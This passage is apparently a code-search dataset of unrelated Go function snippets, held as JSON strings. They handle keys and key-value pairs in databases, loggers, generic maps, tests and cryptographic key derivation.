reduce bool) (gjson.Result, error) {\n\tkeyString := \"[\"\n\tfor _, key := range keys {\n\t\tkeyString += \"\\\"\" + key + \"\\\",\"\n\t}\n\tkeyString = keyString[:len(keyString)-1]\n\tkeyString += \"]\"\n\tpath := \"\"\n\tif !reduce {\n\t\tpath = fmt.Sprintf(\"%s/%s/_design/%s/_view/%s?key=%s&include_docs=true\", couchDB.DatabaseServer, couchDB.DatabaseName, viewObject, viewname, keyString)\n\t} else {\n\t\tpath = fmt.Sprintf(\"%s/%s/_design/%s/_view/%s?key=%s\", couchDB.DatabaseServer, couchDB.DatabaseName, viewObject, viewname, keyString)\n\t}\n\treturn getData(path)\n}", "func mapfn(kvs ...interface{}) (map[string]interface{}, error) {\n\tif len(kvs)%2 != 0 {\n\t\treturn nil, errors.New(\"map requires even number of arguments.\")\n\t}\n\tm := make(map[string]interface{})\n\tfor i := 0; i < len(kvs); i += 2 {\n\t\ts, ok := kvs[i].(string)\n\t\tif !ok {\n\t\t\treturn nil, errors.New(\"even args to map must be strings.\")\n\t\t}\n\t\tm[s] = kvs[i+1]\n\t}\n\treturn m, nil\n}", "func keyValOrder(form url.Values, dataFields interface{}) *orderedmap.OrderedMap {\n\n\t//uMap := make(map[string]interface{}, 0)\n\toMap := orderedmap.NewOrderedMap()\n\tiVal := reflect.ValueOf(dataFields).Elem()\n\ttyp := iVal.Type()\n\n\tfor i := 0; i < iVal.NumField(); i++ {\n\n\t\ttag := typ.Field(i).Tag.Get(\"json\")\n\n\t\tvar omitFound bool\n\t\tif strings.Contains(tag, \",\") == true {\n\t\t\tomitFound = true\n\t\t\tcommaFoundAt := strings.Index(tag, \",\")\n\t\t\t//fmt.Println(\"commaFoundAt-->\", commaFoundAt, tag)\n\t\t\ttag = tag[0:commaFoundAt]\n\t\t}\n\n\t\t//ignored omitemty field which has 0 length\n\t\tif omitFound == true && len(form.Get(tag)) == 0 {\n\t\t\toMap.Set(tag, \"\")\n\t\t\t//fmt.Println(\">>\", tag, \"=\", form.Get(tag), omitFound, len(form.Get(tag)))\n\t\t} else {\n\t\t\toMap.Set(tag, form.Get(tag))\n\t\t}\n\t\t//fmt.Println(\">>\", tag, \"=\", form.Get(tag), omitFound, len(form.Get(tag)))\n\t}\n\n\treturn oMap\n}", "func checkKVs(t *testing.T, kvs []client.KeyValue, expected ...interface{}) {\n\texpLen := len(expected) / 2\n\tif expLen != len(kvs) {\n\t\tt.Errorf(\"%s: expected %d scan results, got %d\", errInfo(), expLen, len(kvs))\n\t\treturn\n\t}\n\tfor i := 0; i < expLen; i++ {\n\t\texpKey := expected[2*i].(roachpb.Key)\n\t\tif key := kvs[i].Key; !key.Equal(expKey) {\n\t\t\tt.Errorf(\"%s: expected scan key %d to be %q; got %q\", errInfo(), i, expKey, key)\n\t\t}\n\t\tswitch expValue := expected[2*i+1].(type) {\n\t\tcase int:\n\t\t\tif value, err := kvs[i].Value.GetInt(); err != nil {\n\t\t\t\tt.Errorf(\"%s: non-integer scan value %d: %q\", errInfo(), i, kvs[i].Value)\n\t\t\t} else if value != int64(expValue) {\n\t\t\t\tt.Errorf(\"%s: expected scan value %d to be %d; got %d\",\n\t\t\t\t\terrInfo(), i, expValue, value)\n\t\t\t}\n\t\tcase string:\n\t\t\tif value := kvs[i].Value.String(); value != expValue {\n\t\t\t\tt.Errorf(\"%s: expected scan value %d to be %s; got %s\",\n\t\t\t\t\terrInfo(), i, expValue, value)\n\t\t\t}\n\t\tdefault:\n\t\t\tt.Fatalf(\"unsupported type %T\", expValue)\n\t\t}\n\t}\n}", "func MkSlice(args ...interface{}) []interface{} {\n\treturn args\n}", "func keyFromValue(v reflect.Value) (state.Key, error) {\n\tswitch v.Kind() {\n\n\tcase reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64:\n\t\treturn state.Key{strconv.Itoa(int(v.Uint()))}, nil\n\n\tcase reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64:\n\t\t// if it is enum in protobuf\n\t\tif stringer, ok := v.Interface().(fmt.Stringer); ok {\n\t\t\treturn state.Key{stringer.String()}, nil\n\t\t}\n\n\t\treturn state.Key{strconv.Itoa(int(v.Int()))}, nil\n\n\tcase reflect.Ptr:\n\t\t// todo: extract key producer and add custom serializers\n\t\tswitch val := v.Interface().(type) {\n\n\t\tcase *timestamp.Timestamp:\n\t\t\tt, err := ptypes.Timestamp(val)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, fmt.Errorf(`timestamp key to time: %w`, err)\n\t\t\t}\n\t\t\treturn state.Key{t.Format(TimestampKeyLayout)}, nil\n\n\t\tdefault:\n\t\t\tkey := state.Key{}\n\t\t\ts := reflect.ValueOf(v.Interface()).Elem()\n\t\t\tfs := s.Type()\n\t\t\t// get all field values from struct\n\t\t\tfor i := 0; i < s.NumField(); i++ {\n\t\t\t\tfield := s.Field(i)\n\t\t\t\tif skipField(fs.Field(i).Name, field) {\n\t\t\t\t\tcontinue\n\t\t\t\t} else {\n\t\t\t\t\tsubKey, err := keyFromValue(reflect.Indirect(v).Field(i))\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn nil, fmt.Errorf(`sub key=%s: %w`, fs.Field(i).Name, err)\n\t\t\t\t\t}\n\t\t\t\t\tkey = key.Append(subKey)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\treturn key, nil\n\t\t}\n\t}\n\n\tswitch v.Type().String() {\n\n\tcase `string`, `int32`, `uint32`, `bool`:\n\t\t// multi key possible\n\t\treturn state.Key{v.String()}, nil\n\n\tcase `[]string`:\n\t\tkey := state.Key{}\n\t\t// every slice element is a part of one key\n\t\tfor i := 0; i < v.Len(); i++ {\n\t\t\tkey = append(key, v.Index(i).String())\n\t\t}\n\t\treturn key, nil\n\n\tdefault:\n\t\treturn nil, ErrFieldTypeNotSupportedForKeyExtraction\n\t}\n}", "func KeyValueForm(node *parser.Node, tab string) (arguments string) {\n\n\ttmp := []string{}\n\n\tfor n := node.Next; n != nil; n = n.Next {\n\t\ttmp = append(tmp, n.Value)\n\t}\n\tseparator := \"\"\n\tendline := \"\"\n\tfor i, raw := range tmp {\n\t\tif (i % 2) == 0 {\n\t\t\tseparator = \"\"\n\t\t\tendline = \"\"\n\t\t} else if (i % 2) != 0 {\n\t\t\tseparator = \"=\"\n\t\t\tif i < (len(tmp) - 1) {\n\t\t\t\tendline = fmt.Sprintf(\"\\\\\\n%s\", tab)\n\t\t\t}\n\t\t}\n\t\targuments = fmt.Sprintf(\"%s%s%s%s\",\n\t\t\targuments,\n\t\t\tseparator,\n\t\t\traw,\n\t\t\tendline)\n\t}\n\n\tif len(node.Flags) > 0 {\n\t\targuments = fmt.Sprintf(\"%s %s\", strings.Join(node.Flags, \" \"), arguments)\n\t}\n\n\treturn arguments + \"\\n\"\n}", "func SubKeys(diff, k1, k2 *Key) {\n\ta := k1.ToExtended()\n\tb := new(CachedGroupElement)\n\tk2.ToExtended().ToCached(b)\n\tc := new(CompletedGroupElement)\n\tgeSub(c, a, b)\n\ttmp := new(ExtendedGroupElement)\n\tc.ToExtended(tmp)\n\ttmp.ToBytes(diff)\n\treturn\n}", "func InfoKV(args ...interface{}) {\n\tcurrentLogger.InfoKVDepth(context.Background(), defaultDepth, args...)\n}", "func keyvalSelector(keyval []KeyVal, keyset []Keyword) []KeyVal {\n\tretList := []KeyVal{}\n\tfor _, kv := range keyval {\n\t\tif InKeywordSlice(kv.Keyword(), keyset) {\n\t\t\tretList = append(retList, kv)\n\t\t}\n\t}\n\treturn retList\n}", "func complexKeyMapEqual(av, bv reflect.Value,\n\tseen map[edge]struct{}) (bool, reflect.Value, reflect.Value) {\n\tfor _, ka := range av.MapKeys() {\n\t\tvar eb reflect.Value // The entry in bv with a key equal to ka\n\t\tfor _, kb := range bv.MapKeys() {\n\t\t\tif deepEqual(ka.Elem().Interface(), kb.Elem().Interface(), seen) {\n\t\t\t\t// Found the corresponding entry in bv.\n\t\t\t\teb = bv.MapIndex(kb)\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif !eb.IsValid() { // We didn't find a key equal to `ka' in 'bv'.\n\t\t\treturn false, ka, reflect.Value{}\n\t\t}\n\t\tea := av.MapIndex(ka)\n\t\tif !deepEqual(ea.Interface(), eb.Interface(), seen) {\n\t\t\treturn false, ka, eb\n\t\t}\n\t}\n\treturn true, reflect.Value{}, reflect.Value{}\n}", "func resolveWithKey(db ds.Database, k string, v *vdl.Value, object *vdl.Value, segment queryparser.Segment) *vdl.Value {\n\tfor _, key := range segment.Keys {\n\t\to := resolveOperand(db, k, v, key)\n\t\tif o == nil {\n\t\t\treturn vdl.ValueOf(nil)\n\t\t}\n\t\tproposedKey := valueFromResolvedOperand(o)\n\t\tif proposedKey == nil {\n\t\t\treturn vdl.ValueOf(nil)\n\t\t}\n\t\tswitch object.Kind() {\n\t\tcase vdl.Array, vdl.List:\n\t\t\t// convert key to int\n\t\t\t// vdl's Index function wants an int.\n\t\t\t// vdl can't make an int.\n\t\t\t// int is guaranteed to be at least 32-bits.\n\t\t\t// So have vdl make an int32 and then convert it to an int.\n\t\t\tindex32 := vdl.IntValue(vdl.Int32Type, 0)\n\t\t\tif err := vdl.Convert(index32, proposedKey); err != nil {\n\t\t\t\treturn vdl.ValueOf(nil)\n\t\t\t}\n\t\t\tindex := int(index32.Int())\n\t\t\tif index < 0 || index >= object.Len() {\n\t\t\t\treturn vdl.ValueOf(nil)\n\t\t\t}\n\t\t\tobject = object.Index(index)\n\t\tcase vdl.Map, vdl.Set:\n\t\t\treqKeyType := object.Type().Key()\n\t\t\tkeyVal := vdl.ZeroValue(reqKeyType)\n\t\t\tif err := vdl.Convert(keyVal, proposedKey); err != nil {\n\t\t\t\treturn vdl.ValueOf(nil)\n\t\t\t}\n\t\t\tif object.Kind() == vdl.Map {\n\t\t\t\trv := object.MapIndex(keyVal)\n\t\t\t\tif rv != nil {\n\t\t\t\t\tobject = rv\n\t\t\t\t} else {\n\t\t\t\t\treturn vdl.ValueOf(nil)\n\t\t\t\t}\n\t\t\t} else { // vdl.Set\n\t\t\t\tobject = vdl.ValueOf(object.ContainsKey(keyVal))\n\t\t\t}\n\t\tdefault:\n\t\t\treturn vdl.ValueOf(nil)\n\t\t}\n\t}\n\treturn object\n}", "func KeyIn(vs ...string) predicate.Blob {\n\tv := make([]interface{}, len(vs))\n\tfor i := range v {\n\t\tv[i] = vs[i]\n\t}\n\treturn predicate.Blob(\n\t\tfunc(s *sql.Selector) {\n\t\t\t// if not arguments were provided, append the FALSE constants,\n\t\t\t// since we can't apply \"IN ()\". This will make this predicate falsy.\n\t\t\tif len(vs) == 0 {\n\t\t\t\ts.Where(sql.False())\n\t\t\t\treturn\n\t\t\t}\n\t\t\ts.Where(sql.In(s.C(FieldKey), v...))\n\t\t},\n\t)\n}", "func V(key string, value interface{}) BuildParamFunc {\n\treturn func(p Param) error {\n\t\tp.SetValue(key, value)\n\t\treturn nil\n\t}\n}", "func kpath(key, keytail string) string {\n\tl, t := len(key), len(keytail)\n\treturn key[:l-t]\n}", "func MapKeys[K comparable, V any, R comparable](in map[K]V, iteratee func(V, K) R) map[R]V {\n\tresult := map[R]V{}\n\n\tfor k, v := range in {\n\t\tresult[iteratee(v, k)] = v\n\t}\n\n\treturn result\n}", "func KeyBy[K comparable, V any](collection []V, iteratee func(V) K) map[K]V {\n\tresult := make(map[K]V, len(collection))\n\n\tfor _, v := range collection {\n\t\tk := iteratee(v)\n\t\tresult[k] = v\n\t}\n\n\treturn result\n}", "func keyPartsFromSelectKey(selectKey string) []interface{} {\n\treturn extractMatches(selectKey, rexSelectKeySegment, true)\n}", "func parameteriseValues(args []string, valueMap map[string]string) []string {\n\tfor k, v := range valueMap {\n\t\tkey := strings.Replace(k, \"_\", \"-\", -1)\n\t\targs = append(args, \"--\"+key)\n\n\t\tif fmt.Sprintf(\"%v\", v) != \"\" {\n\t\t\targs = append(args, fmt.Sprintf(\"%v\", v))\n\t\t}\n\t}\n\n\treturn args\n}", "func PickByKeys[K comparable, V any](in map[K]V, keys []K) map[K]V {\n\tr := map[K]V{}\n\tfor k, v := range in {\n\t\tif Contains(keys, k) {\n\t\t\tr[k] = v\n\t\t}\n\t}\n\treturn r\n}", "func expandKeyTestingOptionsSlice(c *Client, f []KeyTestingOptions, res *Key) ([]map[string]interface{}, error) {\n\tif f == nil {\n\t\treturn nil, nil\n\t}\n\n\titems := []map[string]interface{}{}\n\tfor _, item := range f {\n\t\ti, err := expandKeyTestingOptions(c, &item, res)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\titems = append(items, i)\n\t}\n\n\treturn items, nil\n}", "func fullIter[K comparable, V any](m map[K]V, f func(K, V)) {\n\tseen := map[K]bool{}\n\tfor done := false; !done; {\n\t\tdone = true\n\t\tfor k, v := range m {\n\t\t\tif seen[k] {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tseen[k] = true\n\t\t\tdone = false\n\n\t\t\tf(k, v)\n\t\t}\n\t}\n}", "func key(keys ...string) string {\n\treturn fmt.Sprintf(\"%s:%s\", \"mailimage\", strings.Join(keys, \":\"))\n}", "func filteredKeyValues(cs path.ColorScheme, kv ...string) []string {\n\tif len(kv)%2 != 0 {\n\t\tpanic(\"KeyValues expects even number of parameters\")\n\t}\n\tentries := make([]string, 0)\n\tfor i := 0; i < len(kv); i += 2 {\n\t\tif kv[i+1] == \"\" {\n\t\t\tcontinue\n\t\t}\n\t\tentries = append(entries, cs.KeyValue(kv[i], kv[i+1]))\n\t}\n\treturn entries\n}", "func (n *node) eachKeyValue(key Key, visitor func(key Key, value interface{})) {\n\tif n.isSet() {\n\t\tvisitor(key, n.value)\n\t\treturn\n\t}\n\tfor keyPart, childNode := range n.children {\n\t\tchildNode.eachKeyValue(append(NewKey(key...), keyPart), visitor)\n\t}\n}", "func keys(c *cli.Context) {\n\tif c.NArg() < 1 {\n\t\tfmt.Fprintln(c.App.ErrWriter, \"keys requires at least 1 argument\")\n\t\tcli.ShowCommandHelp(c, \"keys\")\n\t\treturn\n\t}\n\tfor _, filepath := range c.Args() {\n\t\tdecoder := rdr.NewDecoder()\n\t\tgo decode(c, decoder, filepath)\n\t\tfor e := range decoder.Entries {\n\t\t\tfmt.Fprintf(c.App.Writer, \"%v\\n\", e.Key)\n\t\t}\n\t}\n}", "func Key(args ...string) string {\n\treturn strings.Join(args, \":\")\n}", "func StringSlice(k string, v []string) KeyValue {\n\treturn Key(k).StringSlice(v)\n}", "func (l *Logger) With(keyVals ...interface{}) *Logger {\n\tvar (\n\t\tkey string\n\t\tthisIsKey = true\n\t)\nnext:\n\tfor _, arg := range keyVals {\n\t\tif thisIsKey {\n\t\t\tswitch t := arg.(type) {\n\t\t\t// The odd arg treated as the keys. The key must be a\n\t\t\t// string.\n\t\t\tcase string:\n\t\t\t\tkey = t\n\t\t\t// Instead of the key the key-value pair could be\n\t\t\t// passed. Next arg should be a key.\n\t\t\tcase *Pair:\n\t\t\t\tp := t\n\t\t\t\tfor i, c := range l.context {\n\t\t\t\t\tif p.Key == c.Key {\n\t\t\t\t\t\tl.context[i] = p\n\t\t\t\t\t\tbreak next\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tl.context = append(l.context, p)\n\t\t\t\tcontinue\n\t\t\t// Also the slice of key-value pairs could be passed. Next\n\t\t\t// arg should be a key.\n\t\t\tcase []*Pair:\n\t\t\t\tfor _, p := range t {\n\t\t\t\t\tfor i, c := range l.context {\n\t\t\t\t\t\tif c.Key == p.Key {\n\t\t\t\t\t\t\tl.context[i] = p\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tl.context = append(l.context, p)\n\t\t\t\t}\n\t\t\t\tcontinue\n\t\t\t// The key must be be a string type. The logger generates\n\t\t\t// error as a new key-value pair for the record.\n\t\t\tdefault:\n\t\t\t\tl.context = append(l.context, toPair(ErrorKey, fmt.Sprintf(\"non a string type (%T) for the key (%v)\", arg, arg)))\n\t\t\t\tkey = MessageKey\n\t\t\t}\n\t\t} else {\n\t\t\tp := toPair(key, arg)\n\t\t\tfor i, c := range l.context {\n\t\t\t\tif c.Key == key {\n\t\t\t\t\tl.context[i] = p\n\t\t\t\t\tthisIsKey = !thisIsKey\n\t\t\t\t\tbreak next\n\t\t\t\t}\n\t\t\t}\n\t\t\tl.context = append(l.context, toPair(key, arg))\n\t\t}\n\t\t// After the key the next arg is not a key.\n\t\tthisIsKey = !thisIsKey\n\t}\n\tif !thisIsKey && key != MessageKey {\n\t\tl.context = append(l.context, toPair(MessageKey, key))\n\t}\n\treturn l\n}", "func add(e *zerolog.Event, keysAndVals []interface{}) {\n\n\t// make sure we got an even number of arguments\n\tif len(keysAndVals)%2 != 0 {\n\t\te.Interface(\"args\", keysAndVals).\n\t\t\tAnErr(\"zerologr-err\", errors.New(\"odd number of arguments passed as key-value pairs for logging\")).\n\t\t\tStack()\n\t\treturn\n\t}\n\n\tfor i := 0; i < len(keysAndVals); {\n\t\t// process a key-value pair,\n\t\t// ensuring that the key is a string\n\t\tkey, val := keysAndVals[i], keysAndVals[i+1]\n\t\tkeyStr, isString := key.(string)\n\t\tif !isString {\n\t\t\t// if the key isn't a string, log additional error\n\t\t\te.Interface(\"invalid key\", key).\n\t\t\t\tAnErr(\"zerologr-err\", errors.New(\"non-string key argument passed to logging, ignoring all later arguments\")).\n\t\t\t\tStack()\n\t\t\treturn\n\t\t}\n\t\te.Interface(keyStr, val)\n\n\t\ti += 2\n\t}\n}", "func CritKV(ctx context.Context, msg string, args ...field.Field) {\n\tglobal.CritKV(ctx, msg, args...)\n}", "func keys(c *cli.Context) {\n\tif c.NArg() < 1 {\n\t\tfmt.Fprintln(c.App.ErrWriter, \"keys requires at least 1 argument\")\n\t\tcli.ShowCommandHelp(c, \"keys\")\n\t\treturn\n\t}\n\tfor _, filepath := range c.Args() {\n\t\tdecoder := decoder.NewDecoder()\n\t\tgo dump.Decode(c, decoder, filepath)\n\t\tfor e := range decoder.Entries {\n\t\t\tfmt.Fprintf(c.App.Writer, \"%v\\n\", e.Key)\n\t\t}\n\t}\n}", "func Witharg(k string, v interface{}, i interface{}) Pack {\n\tpackT := reflect.TypeOf((*Pack)(nil)).Elem()\n\tif reflect.TypeOf(i) == packT {\n\t\told := i.(Pack)\n\t\told.Args[k] = v\n\t\treturn old\n\t}\n\treturn Pack{\n\t\tOrigin: i,\n\t\tArgs: map[string]interface{}{\n\t\t\tk: v,\n\t\t},\n\t}\n\n}", "func makeKey(args ...string) string {\n\treturn strings.Join(args, \":\")\n}", "func (*Integer) NKeys() int { return 2 }", "func expandKey(c *Client, f *Key) (map[string]interface{}, error) {\n\tm := make(map[string]interface{})\n\tres := f\n\t_ = res\n\tif v, err := dcl.DeriveField(\"projects/%s/keys/%s\", f.Name, dcl.SelfLinkToName(f.Project), dcl.SelfLinkToName(f.Name)); err != nil {\n\t\treturn nil, fmt.Errorf(\"error expanding Name into name: %w\", err)\n\t} else if !dcl.IsEmptyValueIndirect(v) {\n\t\tm[\"name\"] = v\n\t}\n\tif v := f.DisplayName; dcl.ValueShouldBeSent(v) {\n\t\tm[\"displayName\"] = v\n\t}\n\tif v, err := expandKeyWebSettings(c, f.WebSettings, res); err != nil {\n\t\treturn nil, fmt.Errorf(\"error expanding WebSettings into webSettings: %w\", err)\n\t} else if !dcl.IsEmptyValueIndirect(v) {\n\t\tm[\"webSettings\"] = v\n\t}\n\tif v, err := expandKeyAndroidSettings(c, f.AndroidSettings, res); err != nil {\n\t\treturn nil, fmt.Errorf(\"error expanding AndroidSettings into androidSettings: %w\", err)\n\t} else if !dcl.IsEmptyValueIndirect(v) {\n\t\tm[\"androidSettings\"] = v\n\t}\n\tif v, err := expandKeyIosSettings(c, f.IosSettings, res); err != nil {\n\t\treturn nil, fmt.Errorf(\"error expanding IosSettings into iosSettings: %w\", err)\n\t} else if !dcl.IsEmptyValueIndirect(v) {\n\t\tm[\"iosSettings\"] = v\n\t}\n\tif v := f.Labels; dcl.ValueShouldBeSent(v) {\n\t\tm[\"labels\"] = v\n\t}\n\tif v, err := expandKeyTestingOptions(c, f.TestingOptions, res); err != nil {\n\t\treturn nil, fmt.Errorf(\"error expanding TestingOptions into testingOptions: %w\", err)\n\t} else if !dcl.IsEmptyValueIndirect(v) {\n\t\tm[\"testingOptions\"] = v\n\t}\n\tif v, err := dcl.EmptyValue(); err != nil {\n\t\treturn nil, fmt.Errorf(\"error expanding Project into project: %w\", err)\n\t} else if !dcl.IsEmptyValueIndirect(v) {\n\t\tm[\"project\"] = v\n\t}\n\n\treturn m, nil\n}", "func D(v ...interface{}) {}", "func KVSelector(f func(T,T) T) Selector {\n\treturn func(i T) T {\n\t\tp := i.(Pair)\n\t\treturn f(p.Key, p.Value)\n\t}\n}", "func TestMultipleArgs(t *testing.T) {\n\tflagSet := pflag.NewFlagSet(\"\", pflag.PanicOnError)\n\tregisterParamsFlags(flagSet)\n\tassert.NoError(t, flagSet.Parse([]string{\"-p\", \"key1=1\", \"-p\", \"key2=2\"}))\n\tvalues, errors := getParamsFromFlags(flagSet)\n\tassert.Len(t, values, 2)\n\tassert.Len(t, errors, 0)\n}", "func lookupKeysStack(key []string, contexts []reflect.Value) reflect.Value {\n\tvar v reflect.Value\n\n\tif len(key) == 0 {\n\t\treturn v\n\t}\n\n\tfor i := range key {\n\t\tif i == 0 {\n\t\t\tv = lookupKeyStack(key[i], contexts)\n\t\t\tcontinue\n\t\t}\n\t\tv = lookupKeyContext(key[i], v)\n\t\tif !v.IsValid() {\n\t\t\tbreak\n\t\t}\n\t}\n\treturn v\n}", "func TestMockKv_Get(t *testing.T) {\n\tt.Run(\"exact match\", func(t *testing.T) {\n\t\tpair := mvccpb.KeyValue{\n\t\t\tKey: []byte(\"/foo\"),\n\t\t\tValue: []byte(\"1\"),\n\t\t}\n\n\t\tkv := newMockKV()\n\t\tkv.values = map[string]mvccpb.KeyValue{string(pair.Key): pair}\n\t\tres, err := kv.Get(context.Background(), \"/foo\")\n\n\t\trequire.NoError(t, err)\n\t\trequire.Len(t, res.Kvs, 1)\n\t\tassert.Equal(t, []byte(\"/foo\"), res.Kvs[0].Key)\n\t})\n\n\tt.Run(\"not exact match\", func(t *testing.T) {\n\t\tpair := mvccpb.KeyValue{\n\t\t\tKey: []byte(\"/foo\"),\n\t\t\tValue: []byte(\"1\"),\n\t\t}\n\n\t\tkv := newMockKV()\n\t\tkv.values = map[string]mvccpb.KeyValue{string(pair.Key): pair}\n\t\tres, err := kv.Get(context.Background(), \"/bar\")\n\n\t\trequire.NoError(t, err)\n\t\tassert.Empty(t, res.Kvs)\n\t})\n\n\tt.Run(\"prefix match\", func(t *testing.T) {\n\t\tfooPair := mvccpb.KeyValue{\n\t\t\tKey: []byte(\"/foo\"),\n\t\t\tValue: []byte(\"1\"),\n\t\t}\n\t\tbazPair := mvccpb.KeyValue{\n\t\t\tKey: []byte(\"/baz\"),\n\t\t\tValue: []byte(\"2\"),\n\t\t}\n\t\tfirstPair := mvccpb.KeyValue{\n\t\t\tKey: []byte(\"/first\"),\n\t\t\tValue: []byte(\"3\"),\n\t\t}\n\n\t\tkv := newMockKV()\n\t\tkv.values = map[string]mvccpb.KeyValue{\n\t\t\tstring(fooPair.Key): fooPair,\n\t\t\tstring(bazPair.Key): bazPair,\n\t\t\tstring(firstPair.Key): firstPair,\n\t\t}\n\t\tres, err := kv.Get(context.Background(), \"/f\", clientv3.WithPrefix())\n\n\t\trequire.NoError(t, err)\n\t\tassert.ElementsMatch(t, []*mvccpb.KeyValue{&fooPair, &firstPair}, res.Kvs)\n\t})\n\n\tt.Run(\"empty prefix\", func(t *testing.T) {\n\t\tfooPair := mvccpb.KeyValue{\n\t\t\tKey: []byte(\"/foo\"),\n\t\t\tValue: []byte(\"1\"),\n\t\t}\n\t\tbazPair := mvccpb.KeyValue{\n\t\t\tKey: []byte(\"/baz\"),\n\t\t\tValue: []byte(\"2\"),\n\t\t}\n\t\tfirstPair := mvccpb.KeyValue{\n\t\t\tKey: []byte(\"/first\"),\n\t\t\tValue: []byte(\"3\"),\n\t\t}\n\n\t\tkv := newMockKV()\n\t\tkv.values = map[string]mvccpb.KeyValue{\n\t\t\tstring(fooPair.Key): fooPair,\n\t\t\tstring(bazPair.Key): bazPair,\n\t\t\tstring(firstPair.Key): firstPair,\n\t\t}\n\t\tres, err := kv.Get(context.Background(), \"\", clientv3.WithPrefix())\n\n\t\trequire.NoError(t, err)\n\t\tassert.ElementsMatch(t, []*mvccpb.KeyValue{&fooPair, &bazPair, &firstPair}, res.Kvs)\n\t})\n}", "func BuildKVBuffer(kv map[string]string) []byte {\n\t// Scan once to know size of buffer\n\tvar bufSize int\n\tfor k, v := range kv {\n\t\t// k~2 v~2\n\t\tbufSize += 2 + len(k) + 2 + len(v)\n\t}\n\tbufSize += 2 // nh:2\n\n\tbuf := make([]byte, bufSize)\n\twb := typed.NewWriteBuffer(buf)\n\twb.WriteUint16(uint16(len(kv)))\n\tfor k, v := range kv {\n\t\twb.WriteLen16String(k)\n\t\twb.WriteLen16String(v)\n\t}\n\treturn buf[:wb.BytesWritten()]\n}", "func keyGen(items []interface{}, keyable Keyable) map[string]interface{} {\n\tkeyMap := make(map[string]interface{}, len(items))\n\tfor _, item := range items {\n\t\tkey := keyable.Key(item)\n\t\tkeyMap[key] = item\n\t}\n\n\treturn keyMap\n}", "func WarningKV(args ...interface{}) {\n\tcurrentLogger.WarningKVDepth(context.Background(), defaultDepth, args...)\n}", "func getKeyValues(w http.ResponseWriter, r *http.Request) {\n\tvars := mux.Vars(r)\n\tprotocol := vars[\"protocol\"]\n\tendpointType := vars[\"endpointType\"]\n\tvar keys []string\n\terr := json.NewDecoder(r.Body).Decode(&keys)\n\tif err != nil {\n\t\tsendResponse(w, http.StatusBadRequest, err.Error())\n\t\treturn\n\t}\n\tvar response string\n\tif protocol == \"http\" {\n\t\tresponse, err = getHTTP(keys, endpointType)\n\t} else if protocol == \"grpc\" {\n\t\tresponse, err = getGRPC(keys, endpointType)\n\t} else {\n\t\terr = fmt.Errorf(\"unknown protocol in Get call: %s\", protocol)\n\t}\n\tif err != nil {\n\t\tsendResponse(w, http.StatusInternalServerError, err.Error())\n\t\treturn\n\t}\n\tsendResponse(w, http.StatusOK, response)\n}", "func QualifyKey(t *big.Int, params *Params, qualify *PrivateKey, attrs AttributeList) (*PrivateKey, error) {\n\tkey := &PrivateKey{}\n\tk := len(attrs)\n\tl := len(params.H)\n\n\t// Randomly choose t in Zp\n\tif t == nil {\n\t\tvar err error\n\t\tt, err = RandomInZp(rand.Reader)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tkey.A0 = new(bn256.G1).Set(qualify.A0)\n\tproduct := new(bn256.G1).Set(params.G3)\n\tkey.B = make([]*bn256.G1, l-k)\n\tkey.FreeMap = make(map[AttributeIndex]int)\n\tj := 0\n\tfor i, h := range params.H {\n\t\tattrIndex := AttributeIndex(i)\n\t\tif attr, ok := attrs[attrIndex]; ok {\n\t\t\tif attr != nil {\n\t\t\t\thi := new(bn256.G1).ScalarMult(h, attr)\n\t\t\t\tproduct.Add(product, hi)\n\t\t\t\tif index, ok := qualify.FreeMap[attrIndex]; ok {\n\t\t\t\t\tbi := new(bn256.G1).ScalarMult(qualify.B[index], attr)\n\t\t\t\t\tkey.A0.Add(key.A0, bi)\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\tkey.B[j] = new(bn256.G1).ScalarMult(h, t)\n\t\t\tif bidx, ok := qualify.FreeMap[AttributeIndex(i)]; ok {\n\t\t\t\tkey.B[j].Add(qualify.B[bidx], key.B[j])\n\t\t\t\tkey.FreeMap[attrIndex] = j\n\t\t\t\tj++\n\t\t\t}\n\t\t}\n\t}\n\tif params.HSig != nil && qualify.BSig != nil {\n\t\tkey.BSig = new(bn256.G1).ScalarMult(params.HSig, t)\n\t\tkey.BSig.Add(qualify.BSig, key.BSig)\n\t}\n\tproduct.ScalarMult(product, t)\n\n\tkey.A0.Add(key.A0, product)\n\n\tkey.A1 = new(bn256.G2).ScalarMult(params.G, t)\n\tkey.A1.Add(qualify.A1, key.A1)\n\n\treturn key, nil\n}", "func isArrayKey(key string) bool {\n\treturn !isMapKey(key) && strings.HasSuffix(key, array)\n}", "func groupKeyFromTraceKey(fullKeyAsParam paramtools.Params, groupBy []string) string {\n\tret := paramtools.Params{}\n\tfor _, group := range groupBy {\n\t\tvalue, ok := fullKeyAsParam[group]\n\t\tif !ok {\n\t\t\treturn \"\"\n\t\t}\n\t\tret[group] = value\n\t}\n\tkey, err := query.MakeKeyFast(ret)\n\tif err != nil {\n\t\treturn \"\"\n\t}\n\treturn key\n}", "func (*Object) NKeys() int { return 2 }", "func KeyList(argv0 string, args ...string) error {\n\tif len(args) < 1 {\n\t\treturn usageKeyList(argv0)\n\t}\n\tnewArgv0 := argv0 + \" \" + args[0]\n\tnewArgs := args[1:]\n\tswitch args[0] {\n\tcase \"create\":\n\t\treturn command.Create(newArgv0, newArgs...)\n\tcase \"extend\":\n\t\treturn command.Extend(newArgv0, newArgs...)\n\tdefault:\n\t\treturn usageKeyList(argv0)\n\t}\n}", "func copyMap[K comparable, V any](src map[K]V) map[K]V {\n\tif src == nil {\n\t\treturn nil\n\t}\n\tcopiedMap := make(map[K]V)\n\tfor k, v := range src {\n\t\tcopiedMap[k] = v\n\t}\n\treturn copiedMap\n}", "func keyvalMapsFromFeatures(features []Feature) (keyMap []string, valMap []interface{}, err error) {\n\tvar didFind bool\n\tfor _, f := range features {\n\t\tfor k, v := range f.Tags {\n\t\t\tdidFind 